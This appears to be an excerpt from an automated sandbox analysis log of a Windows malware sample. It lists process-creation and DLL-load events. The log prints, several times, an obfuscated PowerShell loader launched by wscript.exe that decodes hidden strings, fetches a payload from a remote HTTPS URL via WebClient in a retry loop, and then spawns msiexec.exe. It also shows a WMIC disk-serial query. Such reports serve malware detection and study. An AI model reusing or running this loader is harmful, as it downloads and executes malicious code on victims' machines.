Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germin
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germin
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germin	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
